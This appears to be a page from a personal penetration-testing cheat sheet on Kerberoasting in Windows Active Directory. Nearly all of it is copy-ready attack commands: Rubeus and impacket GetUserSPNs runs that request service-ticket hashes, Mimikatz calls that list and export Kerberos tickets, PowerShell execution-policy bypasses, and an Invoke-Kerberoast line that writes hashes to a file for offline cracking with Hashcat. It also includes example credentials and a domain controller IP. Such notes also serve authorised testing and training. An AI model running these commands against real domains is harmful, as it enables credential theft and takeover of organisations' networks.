Kerberoasting
If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally
For kerberos to work, times have to be within 5 minutes between attacker and victim.
Rubeus
.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap
Getting SPNs
There are many ways to do it.
setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:[email protected] -dc-ip 10.10.10.21
Mimikatz
Listing cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
Extracting tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'
Invoke-Kerberoast
This powershell script is always my go to. It works pretty fine
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt
Last updated